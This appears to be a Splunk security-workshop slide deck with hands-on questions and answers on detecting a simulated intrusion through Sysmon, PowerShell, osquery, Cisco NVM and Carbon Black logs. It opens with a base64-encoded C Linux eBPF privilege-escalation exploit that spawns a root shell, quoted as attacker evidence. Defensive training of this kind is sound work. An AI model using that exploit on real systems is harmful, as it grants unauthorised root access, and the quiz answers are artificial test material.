ZGUgPHN0cmluZy5oPgojaW5jbHVkZSA8bGludXgvYnBmLmg+CiNpbmNsdWRlIDxsaW51eC91bmlzdGQuaD4KI2luY2x1ZGUgPHN5cy9tbWFuLmg+CiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4KI2luY2x1ZGUgPHN5cy91bi5oPgojaW5jbHVkZSA8c3lzL3N0YX
QuaD4KI2luY2x1ZGUgPHN0ZGludC5oPgoKI2RlZmluZSBQSFlTX09GRlNFVCAweGZmZmY4ODAwMDAwMDAwMDAKI2RlZmluZSBDUkVEX09GRlNFVCAweDVmOAojZGVmaW5lIFVJRF9PRkZTRVQgNAojZGVmaW5lIExPR19CVUZfU0laRSA2NTUzNgojZGVmaW5lIFBST0dTSVpFIDMyOAoKa
W50IHNvY2tldHNbMl07CmludCBtYXBmZCwgcHJvZ2ZkOwoKY2hhciAqX19wcm9nID0gCSJceGI0XHgwOVx4MDBceDAwXHhmZlx4ZmZceGZmXHhmZiIKCQkiXHg1NVx4MDlceDAyXHgwMFx4ZmZceGZmXHhmZlx4ZmYiCgkJIlx4YjdceDAwXHgwMFx4MDBceDAwXHgwMFx4MDBceDAwIgoJCSJc
eDk1XHgwMFx4MDBceDAwXHgwMFx4MDBceDAwXHgwMCIKCQkiXHgxOFx4MTlceDAwXHgwMFx4MDNceDAwXHgwMFx4MDAiCgkJIlx4MDBceDAwXHgwMFx4MDBceDAwXHgwMFx4MDBceDAwIgoJCSJceGJmXHg5MVx4MDBceDAwXHgwMFx4MDBceDAwXHgwMCIKCQkiXHhiZlx4YTJceD
AwXHgwMFx4MDBceDAwXHgwMFx4MDAiCgkJIlx4MDdceDAyXHgwMFx4MDBceGZjXHhmZlx4ZmZceGZmIgoJCSJceDYyXHgwYVx4ZmNceGZmXHgwMFx4MDBceDAwXHgwMCIKCQkiXHg4NVx4MDBceDAwXHgwMFx4MDFceDAwXHgwMFx4MDAiCgkJIlx4NTVceDAwXHgwMVx4MDBceDAwX
HgwMFx4MDBceDAwIgoJCSJceDk1XHgwMFx4MDBceDAwXHgwMFx4MDBceDAwXHgwMCIKCQkiXHg3OVx4MDZceDAwXHgwMFx4MDBceDAwXHgwMFx4MDAiCgkJIlx4YmZceDkxXHgwMFx4MDBceDAwXHgwMFx4MDBceDAwIgoJCSJceGJmXHhhMlx4MDBceDAwXHgwMFx4MDBceDAwXH
gwMCIKCQkiXHgwN1x4MDJceDAwXHgwMFx4ZmNceGZmXHhmZlx4ZmYiCgkJIlx4NjJceDBhXHhmY1x4ZmZceDAxXHgwMFx4MDBceDAwIgoJCSJceDg1XHgwMFx4MDBceDAwXHgwMVx4MDBceDAwXHgwMCIKCQkiXHg1NVx4MDBceDAxXHgwMFx4MDBceDAwXHgwMFx4MDAiCgkJIlx4OTV
ceDAwXHgwMFx4MDBceDAwXHgwMFx4MDBceDAwIgoJCSJceDc5XHgwN1x4MDBceDAwXHgwMFx4MDBceDAwXHgwMCIKCQkiXHhiZlx4OTFceDAwXHgwMFx4MDBceDAwXHgwMFx4MDAiCgkJIlx4YmZceGEyXHgwMFx4MDBceDAwXHgwMFx4MDBceDAwIgoJCSJceDA3XHgwMlx4MDBceD
AwXHhmY1x4ZmZceGZmXHhmZiIKCQkiXHg2Mlx4MGFceGZjXHhmZlx4MDJceDAwXHgwMFx4MDAiCgkJIlx4ODVceDAwXHgwMFx4MDBceDAxXHgwMFx4MDBceDAwIgoJCSJceDU1XHgwMFx4MDFceDAwXHgwMFx4MDBceDAwXHgwMCIKCQkiXHg5NVx4MDBceDAwXHgwMFx4MDBceDAwX
HgwMFx4MDAiCgkJIlx4NzlceDA4XHgwMFx4MDBceDAwXHgwMFx4MDBceDAwIgoJCSJceGJmXHgwMlx4MDBceDAwXHgwMFx4MDBceDAwXHgwMCIKCQkiXHhiN1x4MDBceDAwXHgwMFx4MDBceDAwXHgwMFx4MDAiCgkJIlx4NTVceDA2XHgwM1x4MDBceDAwXHgwMFx4MDBceDAwIgoJC
SJceDc5XHg3M1x4MDBceDAwXHgwMFx4MDBceDAwXHgwMCIKCQkiXHg3Ylx4MzJceDAwXHgwMFx4MDBceDAwXHgwMFx4MDAiCgkJIlx4OTVceDAwXHgwMFx4MDBceDAwXHgwMFx4MDBceDAwIgoJCSJceDU1XHgwNlx4MDJceDAwXHgwMVx4MDBceDAwXHgwMCIKCQkiXHg3Ylx4YTJce
DAwXHgwMFx4MDBceDAwXHgwMFx4MDAiCgkJIlx4OTVceDAwXHgwMFx4MDBceDAwXHgwMFx4MDBceDAwIgoJCSJceDdiXHg4N1x4MDBceDAwXHgwMFx4MDBceDAwXHgwMCIKCQkiXHg5NVx4MDBceDAwXHgwMFx4MDBceDAwXHgwMFx4MDAiOwoKY2hhciBicGZfbG9nX2J1ZltMT0dfQl
VGX1NJWkVdOwoKc3RhdGljIGludCBicGZfcHJvZ19sb2FkKGVudW0gYnBmX3Byb2dfdHlwZSBwcm9nX3R5cGUsCgkJICBjb25zdCBzdHJ1Y3QgYnBmX2luc24gKmluc25zLCBpbnQgcHJvZ19sZW4sCgkJICBjb25zdCBjaGFyICpsaWNlbnNlLCBpbnQga2Vybl92ZXJzaW9uKSB7Cgl1bmlvbiBicGZfYXR
0ciBhdHRyID0gewoJCS5wcm9nX3R5cGUgPSBwcm9nX3R5cGUsCgkJLmluc25zID0gKF9fdTY0KWluc25zLAoJCS5pbnNuX2NudCA9IHByb2dfbGVuIC8gc2l6ZW9mKHN0cnVjdCBicGZfaW5zbiksCgkJLmxpY2Vuc2UgPSAoX191NjQpbGljZW5zZSwKCQkubG9nX2J1ZiA9IChfX3U2NClicGZfbG9nX2J
1ZiwKCQkubG9nX3NpemUgPSBMT0dfQlVGX1NJWkUsCgkJLmxvZ19sZXZlbCA9IDEsCgl9OwoKCWF0dHIua2Vybl92ZXJzaW9uID0ga2Vybl92ZXJzaW9uOwoKCWJwZl9sb2dfYnVmWzBdID0gMDsKCglyZXR1cm4gc3lzY2FsbChfX05SX2JwZiwgQlBGX1BST0dfTE9BRCwgJmF0dHIsIHNpemVvZihh
dHRyKSk7Cn0KCnN0YXRpYyBpbnQgYnBmX2NyZWF0ZV9tYXAoZW51bSBicGZfbWFwX3R5cGUgbWFwX3R5cGUsIGludCBrZXlfc2l6ZSwgaW50IHZhbHVlX3NpemUsCgkJICAgaW50IG1heF9lbnRyaWVzKSB7Cgl1bmlvbiBicGZfYXR0ciBhdHRyID0gewoJCS5tYXBfdHlwZSA9IG1hcF90eXBlLAoJC
S5rZXlfc2l6ZSA9IGtleV9zaXplLAoJCS52YWx1ZV9zaXplID0gdmFsdWVfc2l6ZSwKCQkubWF4X2VudHJpZXMgPSBtYXhfZW50cmllcwoJfTsKCglyZXR1cm4gc3lzY2FsbChfX05SX2JwZiwgQlBGX01BUF9DUkVBVEUsICZhdHRyLCBzaXplb2YoYXR0cikpOwp9CgpzdGF0aWMgaW50IGJwZl91cGRhdG
VfZWxlbSh1aW50NjRfdCBrZXksIHVpbnQ2NF90IHZhbHVlKSB7Cgl1bmlvbiBicGZfYXR0ciBhdHRyID0gewoJCS5tYXBfZmQgPSBtYXBmZCwKCQkua2V5ID0gKF9fdTY0KSZrZXksCgkJLnZhbHVlID0gKF9fdTY0KSZ2YWx1ZSwKCQkuZmxhZ3MgPSAwLAoJfTsKCglyZXR1cm4gc3lzY2FsbChfX05SX2
JwZiwgQlBGX01BUF9VUERBVEVfRUxFTSwgJmF0dHIsIHNpemVvZihhdHRyKSk7Cn0KCnN0YXRpYyBpbnQgYnBmX2xvb2t1cF9lbGVtKHZvaWQgKmtleSwgdm9pZCAqdmFsdWUpIHsKCXVuaW9uIGJwZl9hdHRyIGF0dHIgPSB7CgkJLm1hcF9mZCA9IG1hcGZkLAoJCS5rZXkgPSAoX191NjQpa2V
5LAoJCS52YWx1ZSA9IChfX3U2NCl2YWx1ZSwKCX07CgoJcmV0dXJuIHN5c2NhbGwoX19OUl9icGYsIEJQRl9NQVBfTE9PS1VQX0VMRU0sICZhdHRyLCBzaXplb2YoYXR0cikpOwp9CgpzdGF0aWMgdm9pZCBfX2V4aXQoY2hhciAqZXJyKSB7CglmcHJpbnRmKHN0ZGVyciwgImVycm9yOiAlc1xuIi
wgZXJyKTsKCWV4aXQoLTEpOwp9CgpzdGF0aWMgdm9pZCBwcmVwKHZvaWQpIHsKCW1hcGZkID0gYnBmX2NyZWF0ZV9tYXAoQlBGX01BUF9UWVBFX0FSUkFZLCBzaXplb2YoaW50KSwgc2l6ZW9mKGxvbmcgbG9uZyksIDMpOwoJaWYgKG1hcGZkIDwgMCkKCQlfX2V4aXQoc3RyZXJyb3Io
ZXJybm8pKTsKCglwcm9nZmQgPSBicGZfcHJvZ19sb2FkKEJQRl9QUk9HX1RZUEVfU09DS0VUX0ZJTFRFUiwKCQkJKHN0cnVjdCBicGZfaW5zbiAqKV9fcHJvZywgUFJPR1NJWkUsICJHUEwiLCAwKTsKCglpZiAocHJvZ2ZkIDwgMCkKCQlfX2V4aXQoc3RyZXJyb3IoZXJybm8pKTsKCglpZihzb2NrZX
RwYWlyKEFGX1VOSVgsIFNPQ0tfREdSQU0sIDAsIHNvY2tldHMpKQoJCV9fZXhpdChzdHJlcnJvcihlcnJubykpOwoKCWlmKHNldHNvY2tvcHQoc29ja2V0c1sxXSwgU09MX1NPQ0tFVCwgU09fQVRUQUNIX0JQRiwgJnByb2dmZCwgc2l6ZW9mKHByb2dmZCkpIDwgMCkKCQlfX2V4aXQoc3RyZXJyb3
IoZXJybm8pKTsKfQoKc3RhdGljIHZvaWQgd3JpdGVtc2codm9pZCkgewoJY2hhciBidWZmZXJbNjRdOwoKCXNzaXplX3QgbiA9IHdyaXRlKHNvY2tldHNbMF0sIGJ1ZmZlciwgc2l6ZW9mKGJ1ZmZlcikpOwoKCWlmIChuIDwgMCkgewoJCXBlcnJvcigid3JpdGUiKTsKCQlyZXR1cm47Cgl9CglpZiAobiAhPS
BzaXplb2YoYnVmZmVyKSkKCQlmcHJpbnRmKHN0ZGVyciwgInNob3J0IHdyaXRlOiAlbHVcbiIsIG4pOwp9CgojZGVmaW5lIF9fdXBkYXRlX2VsZW0oYSwgYiwgYykgXAoJYnBmX3VwZGF0ZV9lbGVtKDAsIChhKSk7IFwKCWJwZl91cGRhdGVfZWxlbSgxLCAoYikpOyBcCglicGZfdXBkYXRlX2VsZW0oM
iwgKGMpKTsgXAoJd3JpdGVtc2coKTsKCnN0YXRpYyB1aW50NjRfdCBnZXRfdmFsdWUoaW50IGtleSkgewoJdWludDY0X3QgdmFsdWU7CgoJaWYgKGJwZl9sb29rdXBfZWxlbSgma2V5LCAmdmFsdWUpKQoJCV9fZXhpdChzdHJlcnJvcihlcnJubykpOwoKCXJldHVybiB2YWx1ZTsKfQoKc3RhdGljIHV
pbnQ2NF90IF9fZ2V0X2ZwKHZvaWQpIHsKCV9fdXBkYXRlX2VsZW0oMSwgMCwgMCk7CgoJcmV0dXJuIGdldF92YWx1ZSgyKTsKfQoKc3RhdGljIHVpbnQ2NF90IF9fcmVhZCh1aW50NjRfdCBhZGRyKSB7CglfX3VwZGF0ZV9lbGVtKDAsIGFkZHIsIDApOwoKCXJldHVybiBnZXRfdmFsdWUoMik7Cn0
KCnN0YXRpYyB2b2lkIF9fd3JpdGUodWludDY0X3QgYWRkciwgdWludDY0X3QgdmFsKSB7CglfX3VwZGF0ZV9lbGVtKDIsIGFkZHIsIHZhbCk7Cn0KCnN0YXRpYyB1aW50NjRfdCBnZXRfc3AodWludDY0X3QgYWRkcikgewoJcmV0dXJuIGFkZHIgJiB+KDB4NDAwMCAtIDEpOwp9CgpzdGF0aWMgdm
9pZCBwd24odm9pZCkgewoJdWludDY0X3QgZnAsIHNwLCB0YXNrX3N0cnVjdCwgY3JlZHB0ciwgdWlkcHRyOwoKCWZwID0gX19nZXRfZnAoKTsKCWlmIChmcCA8IFBIWVNfT0ZGU0VUKQoJCV9fZXhpdCgiYm9ndXMgZnAiKTsKCQoJc3AgPSBnZXRfc3AoZnApOwoJaWYgKHNwIDwgUEhZU19PR
kZTRVQpCgkJX19leGl0KCJib2d1cyBzcCIpOwoJCgl0YXNrX3N0cnVjdCA9IF9fcmVhZChzcCk7CgoJaWYgKHRhc2tfc3RydWN0IDwgUEhZU19PRkZTRVQpCgkJX19leGl0KCJib2d1cyB0YXNrIHB0ciIpOwoKCXByaW50ZigidGFza19zdHJ1Y3QgPSAlbHhcbiIsIHRhc2tfc3RydWN0KTsKCgljcmVkcHRyID
0gX19yZWFkKHRhc2tfc3RydWN0ICsgQ1JFRF9PRkZTRVQpOyAvLyBjcmVkCgoJaWYgKGNyZWRwdHIgPCBQSFlTX09GRlNFVCkKCQlfX2V4aXQoImJvZ3VzIGNyZWQgcHRyIik7CgoJdWlkcHRyID0gY3JlZHB0ciArIFVJRF9PRkZTRVQ7IC8vIHVpZAoJaWYgKHVpZHB0ciA8IFBIWVNfT0ZGU0VUK
QoJCV9fZXhpdCgiYm9ndXMgdWlkIHB0ciIpOwoKCXByaW50ZigidWlkcHRyID0gJWx4XG4iLCB1aWRwdHIpOwoJX193cml0ZSh1aWRwdHIsIDApOyAvLyBzZXQgYm90aCB1aWQgYW5kIGdpZCB0byAwCgoJaWYgKGdldHVpZCgpID09IDApIHsKCQlwcmludGYoInNwYXduaW5nIHJvb3Qgc2hlbGxcb
iIpOwoJCXN5c3RlbSgiL2Jpbi9iYXNoIik7CgkJZXhpdCgwKTsKCX0KCglfX2V4aXQoIm5vdCB2dWxuZXJhYmxlPyIpOwp9CgppbnQgbWFpbihpbnQgYXJnYywgY2hhciAqKmFyZ3YpIHsKCXByZXAoKTsKCXB3bigpOwoKCXJldHVybiAwOwp9 &gt;&gt; /tmp/colonel"
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

Question #5
Try It Yourself!

The system being referenced in the previous command listing has had something called
“colonel” compiled on it and executed. What is it?

Privilege Escalation Kernel Exploit


© 2021 SPLUNK INC.

PowerShell
Logging
© 2021 SPLUNK INC.

What are they?


Should we collect?

4104 = Almost always yes


4103 = Sometimes…
800 = same as 4103!
50x = ”largely useless” – basically
logs starts and stops
4100 = Sure, minor volume

https://www.eventsentry.com/blog/201
8/01/powershell-p0wrh11-securing-
powershell.html
© 2021 SPLUNK INC.

But 4104 events


“automatically”
warn for suspicious
modules? Maybe
only collect those?
© 2021 SPLUNK INC.

Almost 200 modules are “Warning” worthy

https://github.com/PowerShell/PowerShell/blob/master/src/System.Management.Automation/engine/runtime/Com
piledScriptBlock.cs
© 2021 SPLUNK INC.

Hands-On:
Sysmon and
PowerShell Logs
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

Question #1
Pivoting from Sysmon Events to PowerShell Events

A pdf was created on a workstation. What makes this file creation puzzling is that the file
was created from a PowerShell process. What host was the file created on? What is the
name of the file?

Hints
• index – main (our most recent BOTS dataset is in “main” so be sure to use this…)
• sourcetype – xmlwineventlog:microsoft-windows-sysmon/operational (Sysmon)
• File Creation in Sysmon is Event Code 11
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

Question #1
Pivoting from Sysmon Events to PowerShell Events

A pdf was created on a workstation. What makes this file creation puzzling is that the file
was created the PowerShell process. What host was the file created on? What is the
name of the file?

Host: AGRADY-L

Filename: 2019-BrewCon-Sessions.pdf
© 2021 SPLUNK INC.

Question #2
Pivoting from Sysmon Events to PowerShell Events

Have we seen this file elsewhere in our Splunk instance? Are there any files associated
with this file that might be suspicious? What sourcetypes do we see referenced?

Hints
• index – main
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

Question #2
Pivoting from Sysmon Events to PowerShell Events

Have we seen this file elsewhere in our Splunk instance? Are there any files associated
with this file that might be suspicious? What sourcetypes do we see referenced?

We only see one reference to the pdf but we do see other similar filename references,
including two .LNK files

Sourcetypes: WinEventLog:Microsoft-Windows-Powershell/Operational,
XmlWinEventLog:Microsoft-Windows-Sysmon/Operational, WinEventLog,
bit9:carbonblack:json, wdtap:alerts, stream:http, stream:ip, fgt_utm, xmlwineventlog
© 2021 SPLUNK INC.

Question #3
Pivoting from Sysmon Events to PowerShell Events

Because we initially saw the pdf being created by PowerShell, perhaps we can learn more
from PowerShell itself. What hosts have visibility into PowerShell and this pdf?

Hint
• Continue with the previous search but look specifically for PowerShell events
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

Question #3
Pivoting from Sysmon Events to PowerShell Events

Because we initially saw the pdf being created by PowerShell, perhaps we can learn more
from PowerShell itself. What hosts have visibility into PowerShell and this pdf?

Hosts: AGRADY-L, JWORTOSKI-L


© 2021 SPLUNK INC.

Question #4
Pivoting from Sysmon Events to PowerShell Events

If we reference the table on the right, we can


see that Script Block Logging has a specific
event ID in PowerShell events. Use that
event ID to find any indicators that might be
useful to monitor for in the future

Hint
• Continue with the previous search
• Make sure to expand events to see the entirety of the
events
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

Question #4
Pivoting from Sysmon Events to PowerShell Events

If we reference the table on the right, we can


see that Script Block Logging has a specific
event ID in PowerShell events. Use that
event ID to find any indicators that might be
useful to monitor for in the future

What could we do with the indicators we


uncovered?
© 2021 SPLUNK INC.

osquery
Because “not everyone runs Windows.”
© 2021 SPLUNK INC.

You Likely Have Some Macs


(Otherwise, why are you doing this module?)

(2016 JAMF ”Managing Apple Devices in the Enterprise”)


© 2021 SPLUNK INC.

(2017 McAfee)
© 2021 SPLUNK INC.

You could, and should, have a traditional endpoint A/V


solution on your corporate Macbooks.

But what could you do with Splunk?


© 2021 SPLUNK INC.

osquery
https://osquery.io/

Query your endpoints via SQL-like


syntax for gobs of OS, IR, and
forensic info

Linux, MacOS, Windows, etc.

Open source

JSON-based log messages

Started by Facebook

FIM!
© 2021 SPLUNK INC.

Community-Contributed Query Packs &


Guidance
© 2021 SPLUNK INC.

osquery

“Query Con” was held – great resource for learning about basic and advanced topics:
• https://www.youtube.com/playlist?list=PLlSdCcsTOu5STvaoPlr-PJE-zbYmlAGrX

Luke Murphey released a community app that acts as a management server for osquery
clients – ask queries right from the Search Head!
• https://splunkbase.splunk.com/app/3902/

We continue to encounter large corporations using osquery + Splunk especially for non-
Windows endpoints
© 2021 SPLUNK INC.

root@hoth:/usr/share/osquery/packs# more fims.conf

osquery {
"queries": {
"file_events": {
Sample Configuration: BOTS "query": "select * from file_events;",
"removed": false,
"interval": 300
}
Default packs for Linux OS },
• https://github.com/facebook/osquery/tree/master/pack "file_paths": {
"homes": [
"/root/.ssh/%%",
Disabled native Linux auditd and used osquery’s "/home/%/.ssh/%%"
hook into it ],
"etc": [
"/etc/%%"
Interval collections between 60 and 300 seconds ],
"home": [
(note that _events tables have full activity fidelity) "/home/%%"
],
"tmp": [
Local UF to collect JSON output and stream into "/tmp/%%"
Splunk ]
}
}
© 2021 SPLUNK INC.

Splunk App for OSquery


https://splunkbase.splunk.com/app/3278/

Browse data provided by default osquery


packs

Dashboards for File Integrity Monitoring,


Process/Port activity, Rare Events for
security investigation

Community App written by Thomas


Przelomiec (Splunk)

Developed with osquery 1.7.3


© 2021 SPLUNK INC.

Hands-On:
osquery
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

Question #1
Command Line with osquery

We are made aware that there is potentially malicious activity targeting a server named
HOTH by a user called tomcat8. This is a Linux machine and we want to view commands
being run on the system. What kinds of activities is this user generating?

Hints
• index - botsv3
• sourcetype - osquery:results
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

Commands executed
• columns.cmdline

Paths
• columns.path
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

Question #1
Command Line with osquery

We are made aware that there is potentially malicious activity targeting a server named
HOTH by a user called tomcat8. This is a Linux machine and we want to view commands
being run on the system. What kinds of activities is this user generating?

Activities Seen
• New user creation
• Netcat
• Execution of colonelnew – whatever that is?
• Inspecting /etc/passwd
• Others?
© 2021 SPLUNK INC.

Question #2
File Integrity Monitoring - Part 1

The adversary gained root privileges on HOTH and made external connections. We need
to think about what might be exfiltrated. What files are being manipulated locally on
HOTH?

Hints
• index – botsv3
• sourcetype - osquery:results
• Look at the different osquery modules (name) and select the one that is most likely going to help us when it
comes to file integrity monitoring
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

Question #2
File Integrity Monitoring - Part 1

The adversary gained root privileges on HOTH and made external connections. We need
to think about what might be exfiltrated. What files are being manipulated locally on
HOTH?
© 2021 SPLUNK INC.

Question #3
File Integrity Monitoring – Part 2

The adversary gained root privileges on HOTH and made external connections. We need
to think about what might be exfiltrated. What files are being manipulated locally on
HOTH?

How can we refine this further?

What files might require additional analysis?


© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

Question #3
File Integrity Monitoring - Part 2

The adversary gained root privileges on HOTH and made external connections. We need
to think about what might be exfiltrated. What files are being manipulated locally on
HOTH?

How can we refine this further?


• Use search or regex command to extraneous files

What files might require additional analysis?


• Loot.txt
• Blargh.tgz
• Others?
© 2021 SPLUNK INC.

Upon further review…


Learn more about osquery
© 2021 SPLUNK INC.

Cisco
Anyconnect
(NVM)
© 2021 SPLUNK INC.

Cisco Anyconnect Network Visibility Module


© 2021 SPLUNK INC.

Cisco NVM Details


Windows, macOS, Android/Knox

Does not need to be connected to VPN to


collect
Processes mapped to network activity (but
must generate network activity)

Needs an Apex license (but you can try it out)

Cisco-supported Splunk App contains a basic


IPFIX collector, or use your own
Data comes to Splunk from collector via Syslog

Special Splunk pricing available with “CESA”


solution, direct from Cisco

https://www.cisco.com/c/en/us/support/docs/security/anyconnect-secure-
mobility-client/200600-Install-and-Configure-Cisco-Network-Visi.html
© 2021 SPLUNK INC.

Hands-On:
Cisco Anyconnect NVM
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

Question #1
Web Browsing

One user navigated to www.brewersassociation.org using Chrome. Who was that user?

Hints
• index – botsv3
• source - cisconvmflowdata
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

Question #1
Web Browsing

One user navigated to www.brewerassociation.org using Chrome. Who was that user?

This wasn’t designed to stump you but to highlight the fidelity of the data collected.

Mallory Kraeusen
© 2021 SPLUNK INC.

Question #2
Network Traffic

Frothly was spearphished, and the fake domain in the phish was “frothly.com”. If we
review our NVM events, we can see two IP addresses and one user associated with traffic
destined there. What are the total bytes_in and bytes_out for each address?

Hints
• index - botsv3
• source - Cisco NVM flow data
• Just because you have a domain doesn’t mean you shouldn’t consider subdomains as well
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

Question #2
Network Traffic

Frothly.com was spearphished. If we review our NVM events, we can see two IP
addresses and one user associated with traffic destined there. What are the total bytes_in
and bytes_out for each address?
© 2021 SPLUNK INC.

Carbon Black
VMWare
© 2021 SPLUNK INC.

CB EDR

EDR Solution

JSON Output

CIM Compliant
• Endpoint
• Network Traffic
• Intrusion Detection

Splunk monitors the JSON outputted


by CB to disk or to an S3 bucket or
over a network.
© 2021 SPLUNK INC.

https://github.com/carbonblack/cb-event-forwarder
© 2021 SPLUNK INC.

Hands-On:
Sysmon Event 22 (DNS)
and CB
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

Challenge Question
Combining Sysmon DNS Logging & CB Process Execution

There is evidence in the logs that the adversary has been on the Frothly network before. If
you trace that evidence, you will identify the FQDN that the adversary communicates with.
Once you identify this, you can pivot to the binary calling out and identify the binary and a
unique characteristic about how it communicates. Focus on laptops during the timeframe
between August 1-3, 2019.

Hints
• index - main
• Start with DNS events in Sysmon
• Laptops all have a host value that ends in “-L”
• The adversary utilizes dynamic DNS; a lookup exists called dynamic-dns.csv
© 2021 SPLUNK INC.

Question #1
Generate a Listing of Binaries that Made DNS Queries

Using the hints below, generate a list with a sorted count of the binaries executed that
make DNS queries.

Hints
• index - main
• Start with DNS events in Sysmon (xmlwineventlog:microsoft-windows-sysmon/operational)
• Laptops all have a host value that ends in “-L”
• Timeframe - Between August 1-3, 2019
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

Question #1
Generate a Listing of Binaries that Made DNS Queries

Using the hints below, generate a list with a sorted count of the binaries executed that
make DNS queries

Now that we have the domains,


where might we want to go from
here?
© 2021 SPLUNK INC.

Question #2
Extracting Domains

Tighten our list of binaries and DNS queries to


return the domain name that exists in the queries.
Don’t forget to deduplicate the query list.

https://splunkbase.splunk.com/app/2734/

Hints
• Build off our previous search
• There are lots of options in URL toolbox but today we will
use the following two commands together in our search
– | eval list="iana"
– | `ut_parse_extended(<fieldname>,list)`
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

Question #2
Extracting Domains

Tighten our list of binaries and DNS


queries to return the domain name that
exists in the queries. Don’t forget to
deduplicate the query list.

Now that we have a list of domains,


can we compare them to our list of
Dynamic DNS providers?
© 2021 SPLUNK INC.

Question #3
Comparing Domains

Use our newly parsed domains to compare them to the list of Dynamic DNS providers
(dynamic-dns.csv) and determine if there are any Dynamic DNS domains in our events.

Hints
• Build off our previous search
• The lookup command will help provide that matching
• The inputlookup command can help you view the contents of a lookup
• Limit your search to just fields you feel are relevant
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

Question #3
Comparing Domains

Use our newly parsed domains to compare them to the list of Dynamic DNS providers
(dynamic-dns.csv) and determine if there are any Dynamic DNS domains in our events.

frenchconnection.servebeer.com
One domain was associated with a Dynamic DNS provider…servebeer.com

But how does this tie back to the binary executed?


© 2021 SPLUNK INC.

Question #4
Associate Dynamic DNS to Binary

With our newly found suspicious QueryName value, generate a list of binaries and hosts
with counts that are associated with this domain.

Hints
• Leverage our previous search and simplify it
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

Question #4
Associate Dynamic DNS to Binary

With our newly found suspicious QueryName value, generate a list of binaries and hosts
with counts that are associated with this domain.

Where can we find information about


these Image values?
© 2021 SPLUNK INC.

Question #5
Identify Binary Characteristics

What unique characteristic does one of those Image (binary) values have that would
validate that the adversary has been on the Frothly network in the past.

Hints
• This data does not exist in Sysmon, use CarbonBlack instead
• Isolate on events on the suspicious hosts
• Type - ingress.event.procstart
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

Question #5
Identify Binary Characteristics

What unique characteristic does one of those Image values have that would validate that
the adversary has been on the Frothly network in the past?

rundll32.exe c:\windows\odbc64.dll, init is running every four seconds on PCERF-L

Is odbc64.dll a standard Windows file?

Whether it is or isn’t, would you expect something like that to run at that frequency?

Could this be an indication of beaconing?


© 2021 SPLUNK INC.

Common Information
Model / Data Models
© 2021 SPLUNK INC.

Common Information Model


Splunk did not invent CIM

Method to take disparate data sets and provide a


common taxonomy to ask questions of the data

Implementation of CIM is via Data Models

Data Models are available for use in Splunk Enterprise


• https://splunkbase.splunk.com/app/1621/
https://conf.splunk.com/files/2017/slides/the-
Heavily used in Enterprise Security power-of-data-normalization-a-look-at-cim-
under-the-hood.pdf
Documentation:
http://docs.splunk.com/Documentation/CIM/latest/User/
Overview
© 2021 SPLUNK INC.

Endpoint Data Model

Takes the best of Application State and Change


Analysis and puts them in one model

FIVE base searches: Ports, Processes, Registry,


Services, Filesystem
• Endpoint.Processes is the workhorse

Dashboards in ES use these models

Change Analysis and Application State remain,


but are deprecated and not accelerated by default
© 2021 SPLUNK INC.

Other Data Models You Will Use To Monitor


Your Endpoints

Authentication - Describes login activities

Change - Describe audit, endpoint, network and accounts and their associated create, read, update,
and delete activities

Event Signatures – New to CIM 4.15 and stores Windows EventID and associated hosts

Intrusion Detection - Describe Attack Detections

Malware - Describes malware detection and endpoint protection management

Network Traffic - Describes flows of data across network infrastructure (sysmon/3)

Updates - Describes patch management events from individual systems or central management tools

Web - Describes web server and/or proxy server data in a security or operational context
© 2021 SPLUNK INC.

Endpoint Content:
Enterprise Security Content Updates
Splunk Security Essentials
© 2021 SPLUNK INC.

Splunk Security Essentials (SSE)


Ideas to Leverage Endpoint Content
© 2021 SPLUNK INC.

Enterprise Security Content Update (ESCU)


© 2021 SPLUNK INC.

Get these on Splunkbase!


If you
search
“ESCU” in
Splunkbase,
the first two
hits are
ESCU and
SSE.
© 2021 SPLUNK INC.

Hands-On:
ESCU and SSE
© 2021 SPLUNK INC.

Question #1
Splunk Security Essentials

As we review our endpoint data, do we have any executables running that might be
masquerading as legitimate executables but are using a similar, but slightly different name
to evade suspicion?

Hints
• Use Splunk Security Essentials
• lookalike is a good word to search for
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

Click on each stage


© 2021 SPLUNK INC.

Type “lookalike”
1

Click 2
© 2021 SPLUNK INC.

Click

MITRE ATT&CK,
Kill Chain &
Data Sources
© 2021 SPLUNK INC.

Click to Expand

Contextual
Information
© 2021 SPLUNK INC.

Click
© 2021 SPLUNK INC.

Click
© 2021 SPLUNK INC.

Click
© 2021 SPLUNK INC.
3
1 Click
Between 8/19/2018
and 8/21/2018

4 2
Click
